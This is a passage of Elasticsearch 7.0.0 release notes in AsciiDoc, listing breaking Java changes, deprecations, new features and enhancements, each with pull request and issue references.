{es-pull}30831[#30831] (issues: {es-issue}26948[#26948], {es-issue}29639[#29639]) - -Security:: -* Remove heuristics that enable security on trial licenses {es-pull}38075[#38075] (issue: {es-issue}38009[#38009]) - -Snapshot/Restore:: -* Include size of snapshot in snapshot metadata {es-pull}30890[#30890] (issue: {es-issue}18543[#18543]) -* Remove azure deprecated settings {es-pull}26099[#26099] (issue: {es-issue}23405[#23405]) - -Store:: -* Drop elasticsearch-translog for 7.0 {es-pull}33373[#33373] (issues: {es-issue}31389[#31389], {es-issue}32281[#32281]) -* completely drop `index.shard.check_on_startup: fix` for 7.0 {es-pull}33194[#33194] - -Suggesters:: -* Fix threshold frequency computation in Suggesters {es-pull}34312[#34312] (issue: {es-issue}34282[#34282]) -* Make Geo Context Mapping Parsing More Strict {es-pull}32821[#32821] (issues: {es-issue}32202[#32202], {es-issue}32412[#32412]) -* Remove the ability to index or query context suggestions without context {es-pull}31007[#31007] (issue: {es-issue}30712[#30712]) - -ZenDiscovery:: -* Best-effort cluster formation if unconfigured {es-pull}36215[#36215] -* Remove DiscoveryPlugin#getDiscoveryTypes {es-pull}38414[#38414] (issue: {es-issue}38410[#38410]) - -[[breaking-java-7.0.0]] -[discrete] -=== Breaking Java changes - -Aggregations:: -* Change GeoHashGrid.Bucket#getKey() to return String {es-pull}31748[#31748] (issue: {es-issue}30320[#30320]) - -Analysis:: -* Remove deprecated AnalysisPlugin#requriesAnalysisSettings method {es-pull}32037[#32037] (issue: {es-issue}32025[#32025]) - -Features/Java High Level REST Client:: -* Drop deprecated methods from Retry {es-pull}33925[#33925] -* Cluster health to default to cluster level {es-pull}31268[#31268] (issue: {es-issue}29331[#29331]) -* Remove deprecated API methods {es-pull}31200[#31200] (issue: {es-issue}31069[#31069]) - -Features/Java Low Level REST Client:: -* Drop deprecated methods {es-pull}33223[#33223] (issues: {es-issue}29623[#29623], {es-issue}30315[#30315]) -* Remove support for maxRetryTimeout from low-level REST client {es-pull}38085[#38085] (issues: {es-issue}25951[#25951], {es-issue}31834[#31834], {es-issue}33342[#33342]) - -Geo:: -* Decouple geojson parse logic from ShapeBuilders {es-pull}27212[#27212] - -Infra/Core:: -* Remove RequestBuilder from Action {es-pull}30966[#30966] -* Handle scheduler exceptions {es-pull}38014[#38014] (issues: {es-issue}28667[#28667], {es-issue}36137[#36137], {es-issue}37708[#37708]) - -Infra/Transport API:: -* Java api clean up: remove deprecated `isShardsAcked` {es-pull}28311[#28311] (issues: {es-issue}27784[#27784], {es-issue}27819[#27819]) - -ZenDiscovery:: -* Make node field in JoinRequest private {es-pull}36405[#36405] - -[[deprecation-7.0.0]] -[discrete] -=== Deprecations - -Aggregations:: -* Deprecate dots in aggregation names {es-pull}31468[#31468] (issues: {es-issue}17600[#17600], {es-issue}19040[#19040]) - -Analysis:: -* Replace parameter unicodeSetFilter with unicode_set_filter {es-pull}29215[#29215] (issue: {es-issue}22823[#22823]) -* Replace delimited_payload_filter by delimited_payload {es-pull}26625[#26625] (issue: {es-issue}21978[#21978]) -* Deprecate Standard Html Strip Analyzer in master {es-pull}26719[#26719] (issue: {es-issue}4704[#4704]) -* Remove `nGram` and `edgeNGram` token filter names (#38911) {es-pull}39070[#39070] (issues: {es-issue}30209[#30209], {es-issue}38911[#38911]) - -Audit:: -* Deprecate index audit output type {es-pull}37301[#37301] (issue: {es-issue}29881[#29881]) - -Core:: -* Deprecate use of scientific 
notation in epoch time parsing {es-pull}36691[#36691] -* Add backcompat for joda time formats {es-pull}36531[#36531] - -Cluster Coordination:: -* Deprecate size in cluster state response {es-pull}39951[#39951] (issue: {es-issue}39806[#39806]) - -Features/Indices APIs:: -* Default copy settings to true and deprecate on the REST layer {es-pull}30598[#30598] -* Reject setting index.optimize_auto_generated_id after version 7.0.0 {es-pull}28895[#28895] (issue: {es-issue}27600[#27600]) - -Features/Ingest:: -* Deprecate `_type` in simulate pipeline requests {es-pull}37949[#37949] (issue: {es-issue}37731[#37731]) - -Features/Java High Level REST Client:: -* Deprecate HLRC security methods {es-pull}37883[#37883] (issues: {es-issue}36938[#36938], {es-issue}37540[#37540]) -* Deprecate HLRC EmptyResponse used by security {es-pull}37540[#37540] (issue: {es-issue}36938[#36938]) - -Features/Watcher:: -* Deprecate xpack.watcher.history.cleaner_service.enabled {es-pull}37782[#37782] (issue: {es-issue}32041[#32041]) -* deprecate types for watcher {es-pull}37594[#37594] (issue: {es-issue}35190[#35190]) - -Graph:: -* Deprecate types in `_graph/explore` calls. {es-pull}40466[#40466] - -Infra/Core:: -* Deprecate negative epoch timestamps {es-pull}36793[#36793] -* Deprecate use of scientific notation in epoch time parsing {es-pull}36691[#36691] - -Infra/Packaging:: -* Deprecate fallback to java on PATH {es-pull}37990[#37990] - -Infra/Scripting:: -* Add types deprecation to script contexts {es-pull}37554[#37554] -* Deprecate _type from LeafDocLookup {es-pull}37491[#37491] -* Remove deprecated params.ctx {es-pull}36848[#36848] (issue: {es-issue}34059[#34059]) - -Infra/Transport API:: -* Deprecate the transport client in favour of the high-level REST client {es-pull}27085[#27085] - -Machine Learning:: -* Deprecate X-Pack centric ML endpoints {es-pull}36315[#36315] (issue: {es-issue}35958[#35958]) -* Adding ml_settings entry to HLRC and Docs for deprecation_info {es-pull}38118[#38118] -* Datafeed deprecation checks {es-pull}38026[#38026] (issue: {es-issue}37932[#37932]) -* Remove "8" prefixes from file structure finder timestamp formats {es-pull}38016[#38016] -* Adjust structure finder for Joda to Java time migration {es-pull}37306[#37306] -* Resolve 7.0.0 TODOs in ML code {es-pull}36842[#36842] (issue: {es-issue}29963[#29963]) - -Mapping:: -* Deprecate type exists requests. {es-pull}34663[#34663] -* Deprecate types in index API {es-pull}36575[#36575] (issues: {es-issue}35190[#35190], {es-issue}35790[#35790]) -* Deprecate uses of _type as a field name in queries {es-pull}36503[#36503] (issue: {es-issue}35190[#35190]) -* Deprecate types in update_by_query and delete_by_query {es-pull}36365[#36365] (issue: {es-issue}35190[#35190]) -* For msearch templates, make sure to use the right name for deprecation logging. {es-pull}36344[#36344] -* Deprecate types in termvector and mtermvector requests. {es-pull}36182[#36182] -* Deprecate types in update requests. {es-pull}36181[#36181] -* Deprecate types in document delete requests. {es-pull}36087[#36087] -* Deprecate types in get, exists, and multi get. {es-pull}35930[#35930] -* Deprecate types in search and multi search templates. {es-pull}35669[#35669] -* Deprecate types in explain requests. {es-pull}35611[#35611] -* Deprecate types in validate query requests. {es-pull}35575[#35575] -* Deprecate types in count and msearch. 
{es-pull}35421[#35421] (issue: {es-issue}34041[#34041]) -* Deprecate types in rollover index API {es-pull}38039[#38039] (issue: {es-issue}35190[#35190]) -* Deprecate types in get field mapping API {es-pull}37667[#37667] (issue: {es-issue}35190[#35190]) -* Deprecate types in the put mapping API. {es-pull}37280[#37280] (issues: {es-issue}29453[#29453], {es-issue}37285[#37285]) -* Support include_type_name in the field mapping and index template APIs. {es-pull}37210[#37210] -* Deprecate types in create index requests. {es-pull}37134[#37134] (issues: {es-issue}29453[#29453], {es-issue}37285[#37285]) -* Deprecate use of the _type field in aggregations. {es-pull}37131[#37131] (issue: {es-issue}36802[#36802]) -* Deprecate reference to _type in lookup queries {es-pull}37016[#37016] (issue: {es-issue}35190[#35190]) -* Deprecate the document create endpoint. {es-pull}36863[#36863] -* Deprecate types in index API {es-pull}36575[#36575] (issues: {es-issue}35190[#35190], {es-issue}35790[#35790]) -* Deprecate types in update APIs {es-pull}36225[#36225] - -Migration:: -* Deprecate X-Pack centric Migration endpoints {es-pull}35976[#35976] (issue: {es-issue}35958[#35958]) - -Monitoring:: -* Deprecate /_xpack/monitoring/* in favor of /_monitoring/* {es-pull}36130[#36130] (issue: {es-issue}35958[#35958]) - -Rollup:: -* Re-deprecate xpack rollup endpoints {es-pull}36451[#36451] (issue: {es-issue}36044[#36044]) -* Deprecate X-Pack centric rollup endpoints {es-pull}35962[#35962] (issue: {es-issue}35958[#35958]) - -Scripting:: -* Adds deprecation logging to ScriptDocValues#getValues. {es-pull}34279[#34279] (issue: {es-issue}22919[#22919]) -* Conditionally use java time api in scripting {es-pull}31441[#31441] - -Search:: -* Deprecate filtering on `_type`. {es-pull}29468[#29468] (issue: {es-issue}15613[#15613]) -* Remove X-Pack centric graph endpoints {es-pull}36010[#36010] (issue: {es-issue}35958[#35958]) -* Deprecate use of type in reindex request body {es-pull}36823[#36823] -* Add typless endpoints for get_source and exist_source {es-pull}36426[#36426] - -Security:: -* Deprecate X-Pack centric license endpoints {es-pull}35959[#35959] (issue: {es-issue}35958[#35958]) -* Deprecate /_xpack/security/* in favor of /_security/* {es-pull}36293[#36293] (issue: {es-issue}35958[#35958]) - -SQL:: -* Deprecate X-Pack SQL translate endpoint {es-pull}36030[#36030] -* Deprecate X-Pack centric SQL endpoints {es-pull}35964[#35964] (issue: {es-issue}35958[#35958]) - -Watcher:: -* Deprecate X-Pack centric watcher endpoints {es-pull}36218[#36218] (issue: {es-issue}35958[#35958]) - - -[[feature-7.0.0]] -[discrete] -=== New features - -Allocation:: -* Node repurpose tool {es-pull}39403[#39403] (issues: {es-issue}37347[#37347], {es-issue}37748[#37748]) - -Analysis:: -* Relax TermVectors API to work with textual fields other than TextFieldType {es-pull}31915[#31915] (issue: {es-issue}31902[#31902]) -* Add support for inlined user dictionary in Nori {es-pull}36123[#36123] (issue: {es-issue}35842[#35842]) -* Add a prebuilt ICU Analyzer {es-pull}34958[#34958] (issue: {es-issue}34285[#34285]) - -Authentication:: -* Add support for API keys to access Elasticsearch {es-pull}38291[#38291] (issue: {es-issue}34383[#34383]) -* OIDC realm authentication flows {es-pull}37787[#37787] -* OIDC Realm JWT+JWS related functionality {es-pull}37272[#37272] (issues: {es-issue}35339[#35339], {es-issue}37009[#37009]) -* OpenID Connect Realm base functionality {es-pull}37009[#37009] (issue: {es-issue}35339[#35339]) - -Authorization:: -* Allow custom 
authorization with an authorization engine {es-pull}38358[#38358] (issues: {es-issue}32435[#32435], {es-issue}36245[#36245], {es-issue}37328[#37328], {es-issue}37495[#37495], {es-issue}37785[#37785], {es-issue}38137[#38137], {es-issue}38219[#38219]) -* Wildcard IndicesPermissions don't cover .security {es-pull}36765[#36765] - -CCR:: -* Generalize search.remote settings to cluster.remote {es-pull}33413[#33413] -* Add ccr follow info api {es-pull}37408[#37408] (issue: {es-issue}37127[#37127]) - -Distributed:: -* Log messages from allocation commands {es-pull}25955[#25955] (issues: {es-issue}22821[#22821], {es-issue}25325[#25325]) - -Features/ILM:: -* Add unfollow action {es-pull}36970[#36970] (issue: {es-issue}34648[#34648]) - -Features/Ingest:: -* Revert "Introduce a Hashing Processor (#31087)" {es-pull}32178[#32178] -* Add ingest-attachment support for per document `indexed_chars` limit {es-pull}28977[#28977] (issue: {es-issue}28942[#28942]) - -Features/Java High Level REST Client:: -* GraphClient for the high level REST client and associated tests {es-pull}32366[#32366] - -Features/Monitoring:: -* Collect only display_name (for now) {es-pull}35265[#35265] (issue: {es-issue}8445[#8445]) - -Geo:: -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}36751[#36751] (issue: {es-issue}35320[#35320]) -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}35320[#35320] (issue: {es-issue}32039[#32039]) -* geotile_grid implementation {es-pull}37842[#37842] (issue: {es-issue}30240[#30240]) -* Fork Lucene's LatLonShape Classes to local lucene package {es-pull}36794[#36794] -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}36751[#36751] (issue: {es-issue}35320[#35320]) -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}35320[#35320] (issue: {es-issue}32039[#32039]) - -Infra/Core:: -* Skip shard refreshes if shard is `search idle` {es-pull}27500[#27500] - -Infra/Logging:: -* Logging: Unify log rotation for index/search slow log {es-pull}27298[#27298] - -Infra/Plugins:: -* Reload secure settings for plugins {es-pull}31383[#31383] (issue: {es-issue}29135[#29135]) - -Infra/REST API:: -* Add an `include_type_name` option. {es-pull}29453[#29453] (issue: {es-issue}15613[#15613]) - -Java High Level REST Client:: -* Add rollup search {es-pull}36334[#36334] (issue: {es-issue}29827[#29827]) - -Java Low Level REST Client:: -* Make warning behavior pluggable per request {es-pull}36345[#36345] -* Add PreferHasAttributeNodeSelector {es-pull}36005[#36005] - -Machine Learning:: -* Filter undefined job groups from update job calendar actions {es-pull}30757[#30757] -* Add delayed datacheck to the datafeed job runner {es-pull}35387[#35387] (issue: {es-issue}35131[#35131]) -* Adds set_upgrade_mode API endpoint {es-pull}37837[#37837] - -Mapping:: -* Add a `feature_vector` field. {es-pull}31102[#31102] (issue: {es-issue}27552[#27552]) -* Expose Lucene's FeatureField. {es-pull}30618[#30618] -* Make typeless APIs usable with indices whose type name is different from `_doc` {es-pull}35790[#35790] (issue: {es-issue}35190[#35190]) -* Give precedence to index creation when mixing typed templates with typeless index creation and vice-versa. 
{es-pull}37871[#37871] (issue: {es-issue}37773[#37773]) -* Add nanosecond field mapper {es-pull}37755[#37755] (issues: {es-issue}27330[#27330], {es-issue}32601[#32601]) - -Ranking:: -* Add ranking evaluation API {es-pull}27478[#27478] (issue: {es-issue}19195[#19195]) - -Recovery:: -* Allow to trim all ops above a certain seq# with a term lower than X, … {es-pull}31211[#31211] (issue: {es-issue}10708[#10708]) - -SQL:: -* Add basic support for ST_AsWKT geo function {es-pull}34205[#34205] -* Add support for SYS GEOMETRY_COLUMNS {es-pull}30496[#30496] (issue: {es-issue}29872[#29872]) -* Introduce HISTOGRAM grouping function {es-pull}36510[#36510] (issue: {es-issue}36509[#36509]) -* DATABASE() and USER() system functions {es-pull}35946[#35946] (issue: {es-issue}35863[#35863]) -* Introduce INTERVAL support {es-pull}35521[#35521] (issue: {es-issue}29990[#29990]) -* Allow sorting of groups by aggregates {es-pull}38042[#38042] (issue: {es-issue}35118[#35118]) -* Implement FIRST/LAST aggregate functions {es-pull}37936[#37936] (issue: {es-issue}35639[#35639]) -* Introduce SQL DATE data type {es-pull}37693[#37693] (issue: {es-issue}37340[#37340]) - -Search:: -* Add “took” timing info to response for _msearch/template API {es-pull}30961[#30961] (issue: {es-issue}30957[#30957]) -* Add allow_partial_search_results flag to search requests with default setting true {es-pull}28440[#28440] (issue: {es-issue}27435[#27435]) -* Enable adaptive replica selection by default {es-pull}26522[#26522] (issue: {es-issue}24915[#24915]) -* Add intervals query {es-pull}36135[#36135] (issues: {es-issue}29636[#29636], {es-issue}32406[#32406]) -* Added soft limit to open scroll contexts #25244 {es-pull}36009[#36009] (issue: {es-issue}25244[#25244]) -* Introduce ability to minimize round-trips in CCS {es-pull}37828[#37828] (issues: {es-issue}32125[#32125], {es-issue}37566[#37566]) -* Add script filter to intervals {es-pull}36776[#36776] -* Add the ability to set the number of hits to track accurately {es-pull}36357[#36357] (issue: {es-issue}33028[#33028]) -* Add a maximum search request size. 
{es-pull}26423[#26423] -* Make IntervalQuery available via the Query DSL {es-pull}36135[#36135] (issue: {es-issue}29636[#29636]) - -Security:: -* Switch internal security index to ".security-7" {es-pull}39337[#39337] (issue: {es-issue}39284[#39284]) - -Suggesters:: -* Serialize suggestion responses as named writeables {es-pull}30284[#30284] (issue: {es-issue}26585[#26585]) - - -[[enhancement-7.0.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Uses MergingDigest instead of AVLDigest in percentiles agg {es-pull}28702[#28702] (issue: {es-issue}19528[#19528]) -* Added keyed response to pipeline percentile aggregations 22302 {es-pull}36392[#36392] (issue: {es-issue}22302[#22302]) -* Enforce max_buckets limit only in the final reduction phase {es-pull}36152[#36152] (issues: {es-issue}32125[#32125], {es-issue}35921[#35921]) -* Histogram aggs: add empty buckets only in the final reduce step {es-pull}35921[#35921] -* Handles exists query in composite aggs {es-pull}35758[#35758] -* Added parent validation for auto date histogram {es-pull}35670[#35670] -* Add Composite to AggregationBuilders {es-pull}38207[#38207] (issue: {es-issue}38020[#38020]) -* Allow nested fields in the composite aggregation {es-pull}37178[#37178] (issue: {es-issue}28611[#28611]) -* Remove single shard optimization when suggesting shard_size {es-pull}37041[#37041] (issue: {es-issue}32125[#32125]) -* Use List instead of priority queue for stable sorting in bucket sort aggregator {es-pull}36748[#36748] (issue: {es-issue}36322[#36322]) -* Keys are compared in BucketSortPipelineAggregation so making key type… {es-pull}36407[#36407] - -Allocation:: -* Fail start on obsolete indices documentation {es-pull}37786[#37786] (issue: {es-issue}27073[#27073]) -* Fail start on invalid index metadata {es-pull}37748[#37748] (issue: {es-issue}27073[#27073]) -* Fail start of non-data node if node has data {es-pull}37347[#37347] (issue: {es-issue}27073[#27073]) - -Analysis:: -* Allow word_delimiter_graph_filter to not adjust internal offsets {es-pull}36699[#36699] (issues: {es-issue}33710[#33710], {es-issue}34741[#34741]) -* Ensure TokenFilters only produce single tokens when parsing synonyms {es-pull}34331[#34331] (issue: {es-issue}34298[#34298]) -* Allow word_delimiter_graph_filter to not adjust internal offsets {es-pull}36699[#36699] (issues: {es-issue}33710[#33710], {es-issue}34741[#34741]) - -Audit:: -* Add "request.id" to file audit logs {es-pull}35536[#35536] -* Security Audit includes HTTP method for requests {es-pull}37322[#37322] (issue: {es-issue}29765[#29765]) -* Add X-Forwarded-For to the logfile audit {es-pull}36427[#36427] - -Authentication:: -* Invalidate Token API enhancements - HLRC {es-pull}36362[#36362] (issue: {es-issue}35388[#35388]) -* Add DEBUG/TRACE logs for LDAP bind {es-pull}36028[#36028] -* Add Tests for findSamlRealm {es-pull}35905[#35905] -* Add realm information for Authenticate API {es-pull}35648[#35648] -* Formal support for "password_hash" in Put User {es-pull}35242[#35242] (issue: {es-issue}34729[#34729]) -* Propagate auth result to listeners {es-pull}36900[#36900] (issue: {es-issue}30794[#30794]) -* Reorder realms based on last success {es-pull}36878[#36878] -* Improve error message for 6.x style realm settings {es-pull}36876[#36876] (issues: {es-issue}30241[#30241], {es-issue}36026[#36026]) -* Change missing authn message to not mention tokens {es-pull}36750[#36750] -* Invalidate Token API enhancements - HLRC {es-pull}36362[#36362] (issue: {es-issue}35388[#35388]) -* Enhance Invalidate Token API 
{es-pull}35388[#35388] (issues: {es-issue}34556[#34556], {es-issue}35115[#35115]) - -Authorization:: -* Improve exact index matching performance {es-pull}36017[#36017] -* `manage_token` privilege for `kibana_system` {es-pull}35751[#35751] -* Grant .tasks access to kibana_system role {es-pull}35573[#35573] -* Add apm_user reserved role {es-pull}38206[#38206] -* Permission for restricted indices {es-pull}37577[#37577] (issue: {es-issue}34454[#34454]) -* Remove kibana_user and kibana_dashboard_only_user index privileges {es-pull}37441[#37441] -* Create snapshot role {es-pull}35820[#35820] (issue: {es-issue}34454[#34454]) - -Build:: -* Sounds like typo in exception message {es-pull}35458[#35458] -* Allow set section in setup section of REST tests {es-pull}34678[#34678] - -CCR:: -* Add time since last auto follow fetch to auto follow stats {es-pull}36542[#36542] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Clean followed leader index UUIDs in auto follow metadata {es-pull}36408[#36408] (issue: {es-issue}33007[#33007]) -* Change AutofollowCoordinator to use wait_for_metadata_version {es-pull}36264[#36264] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Refactor AutoFollowCoordinator to track leader indices per remote cluster {es-pull}36031[#36031] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Concurrent file chunk fetching for CCR restore {es-pull}38495[#38495] -* Tighten mapping syncing in ccr remote restore {es-pull}38071[#38071] (issues: {es-issue}36879[#36879], {es-issue}37887[#37887]) -* Do not allow put mapping on follower {es-pull}37675[#37675] (issue: {es-issue}30086[#30086]) -* Added ccr to xpack usage infrastructure {es-pull}37256[#37256] (issue: {es-issue}37221[#37221]) -* FollowingEngine should fail with 403 if operation has no seqno assigned {es-pull}37213[#37213] -* Added auto_follow_exception.timestamp field to auto follow stats {es-pull}36947[#36947] -* Reduce retention lease sync intervals {es-pull}40302[#40302] -* Renew retention leases while following {es-pull}39335[#39335] (issues: {es-issue}37165[#37165], {es-issue}38718[#38718]) -* Reduce refresh when lookup term in FollowingEngine {es-pull}39184[#39184] -* Integrate retention leases to recovery from remote {es-pull}38829[#38829] (issue: {es-issue}37165[#37165]) -* Enable removal of retention leases {es-pull}38751[#38751] (issue: {es-issue}37165[#37165]) -* Introduce forget follower API {es-pull}39718[#39718] (issue: {es-issue}37165[#37165]) - -Client:: -* Fixed required fields and paths list {es-pull}39358[#39358] - -Cluster Coordination:: -* Remove timeout task after completing cluster state publication {es-pull}40411[#40411] -* Use default discovery implementation for single-node discovery {es-pull}40036[#40036] -* Do not log unsuccessful join attempt each time {es-pull}39756[#39756] - -Core:: -* Override the JVM DNS cache policy {es-pull}36570[#36570] -* Replace usages of AtomicBoolean based block of code by the RunOnce class {es-pull}35553[#35553] (issue: {es-issue}35489[#35489]) -* Added wait_for_metadata_version parameter to cluster state api. 
{es-pull}35535[#35535] -* Extract RunOnce into a dedicated class {es-pull}35489[#35489] -* Introduce elasticsearch-core jar {es-pull}28191[#28191] (issue: {es-issue}27933[#27933]) -* Rename core module to server {es-pull}28180[#28180] (issue: {es-issue}27933[#27933]) - -CRUD:: -* Rename seq# powered optimistic concurrency control parameters to ifSeqNo/ifPrimaryTerm {es-pull}36757[#36757] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Expose Sequence Number based Optimistic Concurrency Control in the rest layer {es-pull}36721[#36721] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add doc's sequence number + primary term to GetResult and use it for updates {es-pull}36680[#36680] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add seq no powered optimistic locking support to the index and delete transport actions {es-pull}36619[#36619] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add Seq# based optimistic concurrency control to UpdateRequest {es-pull}37872[#37872] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Introduce ssl settings to reindex from remote {es-pull}37527[#37527] (issues: {es-issue}29755[#29755], {es-issue}37287[#37287]) -* Use Sequence number powered OCC for processing updates {es-pull}37308[#37308] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Document Seq No powered optimistic concurrency control {es-pull}37284[#37284] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Enable IPv6 URIs in reindex from remote {es-pull}36874[#36874] -* Set acking timeout to 0 on dynamic mapping update {es-pull}31140[#31140] (issues: {es-issue}30672[#30672], {es-issue}30844[#30844]) - -Discovery-Plugins:: -* Adds connect and read timeouts to discovery-gce {es-pull}28193[#28193] (issue: {es-issue}24313[#24313]) - -Distributed:: -* [Close Index API] Mark shard copy as stale if needed during shard verification {es-pull}36755[#36755] -* [Close Index API] Refactor MetadataIndexStateService {es-pull}36354[#36354] (issue: {es-issue}36249[#36249]) -* [Close Index API] Add TransportShardCloseAction for pre-closing verifications {es-pull}36249[#36249] -* TransportResyncReplicationAction should not honour blocks {es-pull}35795[#35795] (issues: {es-issue}35332[#35332], {es-issue}35597[#35597]) -* Expose all permits acquisition in IndexShard and TransportReplicationAction {es-pull}35540[#35540] (issue: {es-issue}33888[#33888]) -* [RCI] Check blocks while having index shard permit in TransportReplicationAction {es-pull}35332[#35332] (issue: {es-issue}33888[#33888]) -* Recover retention leases during peer recovery {es-pull}38435[#38435] (issue: {es-issue}37165[#37165]) -* Lift retention lease expiration to index shard {es-pull}38380[#38380] (issues: {es-issue}37165[#37165], {es-issue}37963[#37963], {es-issue}38070[#38070]) -* Introduce retention lease 
background sync {es-pull}38262[#38262] (issue: {es-issue}37165[#37165]) -* Allow shards of closed indices to be replicated as regular shards {es-pull}38024[#38024] (issue: {es-issue}33888[#33888]) -* Expose retention leases in shard stats {es-pull}37991[#37991] (issue: {es-issue}37165[#37165]) -* Introduce retention leases versioning {es-pull}37951[#37951] (issue: {es-issue}37165[#37165]) -* Soft-deletes policy should always fetch latest leases {es-pull}37940[#37940] (issues: {es-issue}37165[#37165], {es-issue}37375[#37375]) -* Sync retention leases on expiration {es-pull}37902[#37902] (issue: {es-issue}37165[#37165]) -* Ignore shard started requests when primary term does not match {es-pull}37899[#37899] (issue: {es-issue}33888[#33888]) -* Move update and delete by query to use seq# for optimistic concurrency control {es-pull}37857[#37857] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148], {es-issue}37639[#37639]) -* Introduce retention lease serialization {es-pull}37447[#37447] (issues: {es-issue}37165[#37165], {es-issue}37398[#37398]) -* Add run under primary permit method {es-pull}37440[#37440] (issue: {es-issue}37398[#37398]) -* Introduce retention lease syncing {es-pull}37398[#37398] (issue: {es-issue}37165[#37165]) -* Introduce retention lease persistence {es-pull}37375[#37375] (issue: {es-issue}37165[#37165]) -* Add validation for retention lease construction {es-pull}37312[#37312] (issue: {es-issue}37165[#37165]) -* Introduce retention lease expiration {es-pull}37195[#37195] (issue: {es-issue}37165[#37165]) -* Introduce shard history retention leases {es-pull}37167[#37167] (issue: {es-issue}37165[#37165]) -* [Close Index API] Add unique UUID to ClusterBlock {es-pull}36775[#36775] -* [Close Index API] Propagate tasks ids between Freeze, Close and Verify Shard actions {es-pull}36630[#36630] -* Always initialize the global checkpoint {es-pull}34381[#34381] -* Introduce retention lease actions {es-pull}38756[#38756] (issue: {es-issue}37165[#37165]) -* Add dedicated retention lease exceptions {es-pull}38754[#38754] (issue: {es-issue}37165[#37165]) -* Copy retention leases when trim unsafe commits {es-pull}37995[#37995] (issue: {es-issue}37165[#37165]) -* Allow retention lease operations under blocks {es-pull}39089[#39089] (issues: {es-issue}34648[#34648], {es-issue}37165[#37165]) -* Remove retention leases when unfollowing {es-pull}39088[#39088] (issues: {es-issue}34648[#34648], {es-issue}37165[#37165]) -* Introduce retention lease state file {es-pull}39004[#39004] (issues: {es-issue}37165[#37165], {es-issue}38588[#38588], {es-issue}39032[#39032]) -* Enable soft-deletes by default for 7.0+ indices {es-pull}38929[#38929] (issue: {es-issue}36141[#36141]) - -Engine:: -* Remove versionType from translog {es-pull}31945[#31945] -* Do retry if primary fails on AsyncAfterWriteAction {es-pull}31857[#31857] (issues: {es-issue}31716[#31716], {es-issue}31755[#31755]) -* handle AsyncAfterWriteAction exception before listener is registered {es-pull}31755[#31755] (issue: {es-issue}31716[#31716]) -* Use IndexWriter#flushNextBuffer to free memory {es-pull}27753[#27753] -* Remove pre 6.0.0 support from InternalEngine {es-pull}27720[#27720] -* Add sequence numbers based optimistic concurrency control support to Engine {es-pull}36467[#36467] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Require soft-deletes when access changes snapshot {es-pull}36446[#36446] -* Use delCount of 
SegmentInfos to calculate numDocs {es-pull}36323[#36323] -* Always configure soft-deletes field of IndexWriterConfig {es-pull}36196[#36196] (issue: {es-issue}36141[#36141]) -* Enable soft-deletes by default on 7.0.0 or later {es-pull}36141[#36141] -* Always return false from `refreshNeeded` on ReadOnlyEngine {es-pull}35837[#35837] (issue: {es-issue}35785[#35785]) -* Add a `_freeze` / `_unfreeze` API {es-pull}35592[#35592] (issue: {es-issue}34352[#34352]) -* [RCI] Add IndexShardOperationPermits.asyncBlockOperations(ActionListener) {es-pull}34902[#34902] (issue: {es-issue}33888[#33888]) -* Specialize pre-closing checks for engine implementations {es-pull}38702[#38702] -* Ensure that max seq # is equal to the global checkpoint when creating ReadOnlyEngines {es-pull}37426[#37426] -* Enable Bulk-Merge if all source remains {es-pull}37269[#37269] -* Rename setting to enable mmap {es-pull}37070[#37070] (issue: {es-issue}36668[#36668]) -* Add hybridfs store type {es-pull}36668[#36668] -* Introduce time-based retention policy for soft-deletes {es-pull}34943[#34943] (issue: {es-issue}34908[#34908]) -* Handle AsyncAfterWriteAction failure on primary in the same way as failures on replicas {es-pull}31969[#31969] (issues: {es-issue}31716[#31716], {es-issue}31755[#31755]) -* Explicitly advance max_seq_no before indexing {es-pull}39473[#39473] (issue: {es-issue}38879[#38879]) -* Also mmap cfs files for hybridfs {es-pull}38940[#38940] (issue: {es-issue}36668[#36668]) - -Features/CAT APIs:: -* Expose `search.throttled` on `_cat/indices` {es-pull}37073[#37073] (issue: {es-issue}34352[#34352]) - -Features/Features:: -* Run Node deprecation checks locally (#38065) {es-pull}38250[#38250] (issue: {es-issue}38065[#38065]) - -Features/ILM:: -* Ensure ILM policies run safely on leader indices {es-pull}38140[#38140] (issue: {es-issue}34648[#34648]) -* Skip Shrink when numberOfShards not changed {es-pull}37953[#37953] (issue: {es-issue}33275[#33275]) -* Inject Unfollow before Rollover and Shrink {es-pull}37625[#37625] (issue: {es-issue}34648[#34648]) -* Add set_priority action to ILM {es-pull}37397[#37397] (issue: {es-issue}36905[#36905]) -* Add Freeze Action {es-pull}36910[#36910] (issue: {es-issue}34630[#34630]) - -Features/Indices APIs:: -* Add cluster-wide shard limit {es-pull}32856[#32856] (issue: {es-issue}20705[#20705]) -* Remove RestGetAllAliasesAction {es-pull}31308[#31308] (issue: {es-issue}31129[#31129]) -* Add rollover-creation-date setting to rolled over index {es-pull}31144[#31144] (issue: {es-issue}30887[#30887]) -* add is-write-index flag to aliases {es-pull}30942[#30942] -* Make index and bulk APIs work without types. {es-pull}29479[#29479] -* Simplify deprecation issue levels {es-pull}36326[#36326] -* New mapping signature and mapping string source fixed. 
